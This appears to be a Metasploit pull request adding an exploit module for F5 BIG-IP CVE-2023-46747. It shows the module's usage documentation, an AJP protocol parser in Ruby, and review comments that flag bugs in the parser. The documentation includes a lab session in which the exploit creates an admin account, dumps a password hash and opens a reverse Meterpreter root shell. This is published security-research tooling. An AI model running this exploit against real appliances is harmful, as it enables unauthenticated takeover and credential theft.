Land #18497, Add Exploit For F5 CVE-2023-46747
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.
Showing 5 changed files with 501 additions and 6 deletions.
77 changes: 77 additions & 0 deletions
documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747.md
@@ -0,0 +1,77 @@ | ||
## Vulnerable Application | ||
|
||
### Description | ||
|
||
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, | ||
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to | ||
execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are | ||
created. | ||
|
||
Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4. | ||
|
||
### Setup | ||
|
||
Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software. | ||
|
||
The target does not need to be licensed to be vulnerable. | ||
|
||
## Verification Steps | ||
|
||
1. Install the application | ||
2. Start msfconsole | ||
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747` | ||
4. Set the `RHOST`, `PAYLOAD` and payload-related options | ||
5. Do: `run` | ||
6. You should get a shell. | ||
|
||
## Targets | ||
|
||
### Command | ||
|
||
This executes an OS command on the target device. | ||
|
||
## Options | ||
|
||
## Scenarios | ||
|
||
### F5 BIG-IP 17.0.0.1-0.0.4 | ||
|
||
``` | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32 | ||
RHOSTS => 192.168.159.32 | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp | ||
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128 | ||
LHOST => 192.168.159.128 | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check | ||
[+] 192.168.159.32:443 - The target is vulnerable. | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit | ||
[*] Started reverse TCP handler on 192.168.159.128:4444 | ||
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS | ||
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10 | ||
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA | ||
[*] Sending stage (24768 bytes) to 192.168.159.32 | ||
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400 | ||
meterpreter > getuid | ||
Server username: root | ||
meterpreter > sysinfo | ||
Computer : f5test2.home.lan | ||
OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022 | ||
Architecture : x64 | ||
Meterpreter : python/linux | ||
meterpreter > pwd | ||
/var/service/restjavad | ||
meterpreter > background | ||
[*] Backgrounding session 1... | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds | ||
Credentials | ||
=========== | ||
host origin service public private realm private_type JtR Format cracked_password | ||
---- ------ ------- ------ ------- ----- ------------ ---------- ---------------- | ||
192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > | ||
``` |
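Review bot: step 4 of the Verification Steps tells the reader to set `RHOST`, but the scenario session sets `RHOSTS`, which is the datastore option the module actually reads; change step 4 to `RHOSTS`. The `## Options` section is also empty, so either list the module-specific options there or drop the heading.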
@@ -0,0 +1,127 @@ | ||
# -*- coding: binary -*- | ||
|
||
require 'bindata' | ||
|
||
# @see: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html | ||
module Rex::Proto::ApacheJP | ||
class ApacheJPBoolean < BinData::Primitive | ||
endian :big | ||
|
||
uint8 :data | ||
|
||
def get | ||
self.data != 0 | ||
end | ||
|
||
def set(v) | ||
self.data = v ? 1 : 0 | ||
end | ||
end | ||
|
||
class ApacheJPString < BinData::Primitive | ||
endian :big | ||
|
||
uint16 :len, value: -> { data.length } | ||
stringz :data | ||
|
||
def get | ||
self.data | ||
end | ||
|
||
def set(v) | ||
self.data = v | ||
end | ||
end | ||
|
||
class ApacheJPReqHeaderName < BinData::Primitive | ||
COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent } | ||
endian :big | ||
|
||
uint16 :len_or_code | ||
stringz :data, onlyif: -> { len_or_code < 0xa000 } | ||
|
||
def get | ||
if len_or_code >= 0xa000 | ||
COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1] | ||
else | ||
self.data | ||
end | ||
end | ||
|
||
def set(v) | ||
if (idx = COMMON_HEADERS.index(v)) | ||
self.len_or_code = 0xa000 | (idx + 1) | ||
else | ||
raise RuntimeError if v.length >= 0xa000 | ||
|
||
self.len_or_code = v.length | ||
self.data = v | ||
end | ||
end | ||
end | ||
|
||
class ApacheJPRequestHeader < BinData::Record | ||
endian :big | ||
|
||
apache_jp_req_header_name :header_name | ||
apache_jp_string :header_value | ||
end | ||
|
||
class ApacheJPRequestAttribute < BinData::Record | ||
CODE_CONTEXT = 1 | ||
CODE_SERVLET_PATH = 2 | ||
CODE_REMOTE_USER = 3 | ||
CODE_AUTH_TYPE = 4 | ||
CODE_QUERY_STRING = 5 | ||
CODE_JVM_ROUTE = 6 | ||
CODE_SSL_CERT = 7 | ||
CODE_SSL_CIPHER = 8 | ||
CODE_SSL_SESSION = 9 | ||
CODE_REQ_ATTRIBUTE = 10 | ||
CODE_TERMINATOR = 0xff | ||
|
||
endian :big | ||
|
||
uint8 :code | ||
apache_jp_string :attribute_value, onlyif: -> { code != CODE_TERMINATOR } | ||
end | ||
|
||
class ApacheJPForwardRequest < BinData::Record | ||
HTTP_METHOD_OPTIONS = 1 | ||
HTTP_METHOD_GET = 2 | ||
HTTP_METHOD_HEAD = 3 | ||
HTTP_METHOD_POST = 4 | ||
HTTP_METHOD_PUT = 5 | ||
HTTP_METHOD_DELETE = 6 | ||
HTTP_METHOD_TRACE = 7 | ||
HTTP_METHOD_PROPFIND = 8 | ||
HTTP_METHOD_PROPPATCH = 9 | ||
HTTP_METHOD_MKCOL = 10 | ||
HTTP_METHOD_COPY = 11 | ||
HTTP_METHOD_MOVE = 12 | ||
HTTP_METHOD_LOCK = 13 | ||
HTTP_METHOD_UNLOCK = 14 | ||
HTTP_METHOD_ACL = 15 | ||
HTTP_METHOD_REPORT = 16 | ||
HTTP_METHOD_VERSION_CONTROL = 17 | ||
HTTP_METHOD_CHECKIN = 18 | ||
HTTP_METHOD_CHECKOUT = 19 | ||
HTTP_METHOD_UNCHECKOUT = 20 | ||
HTTP_METHOD_SEARCH = 21 | ||
|
||
endian :big | ||
|
||
uint8 :prefix_code, value: 2 | ||
uint8 :http_method | ||
apache_jp_string :protocol, initial_value: 'HTTP/1.1' | ||
apache_jp_string :req_uri | ||
apache_jp_string :remote_addr | ||
apache_jp_string :remote_host | ||
apache_jp_string :server_name | ||
uint16 :server_port, initial_value: -> { is_ssl ? 80 : 443 } | ||
apache_jp_boolean :is_ssl, initial_value: false | ||
uint16 :num_headers, initial_value: -> { headers.length } | ||
array :headers, type: :apache_jp_request_header, initial_length: :num_headers | ||
array :attributes, type: :apache_jp_request_attribute, read_until: -> { element.code == ApacheJPRequestAttribute::TERMINATOR } | ||
end | ||
end |
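Review bot: the `read_until` lambda on the `attributes` array references `ApacheJPRequestAttribute::TERMINATOR`, a constant that does not exist; the class defines `CODE_TERMINATOR`, so parsing a forward request will raise a NameError as soon as the first attribute is read. Use `ApacheJPRequestAttribute::CODE_TERMINATOR`. The `server_port` default is also inverted: `initial_value: -> { is_ssl ? 80 : 443 }` yields 80 when SSL is on and 443 when it is off, the reverse of the intended defaults; it should read `is_ssl ? 443 : 80`. Consider `value: -> { headers.length }` instead of `initial_value:` for `num_headers`, so the count cannot drift from the array when headers are appended after construction.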